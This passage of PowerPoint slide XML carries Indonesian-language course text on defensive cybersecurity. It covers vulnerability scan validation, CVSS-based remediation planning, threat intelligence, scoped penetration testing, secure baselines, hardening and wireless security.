              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>negatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> log dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jadwalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>remediasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CVSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t> CVSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>tindakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> saran dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buletin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</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196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="90247222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PENGANTAR PELAJARAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menawarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> minimum yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengerasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penonaktifan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>izin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
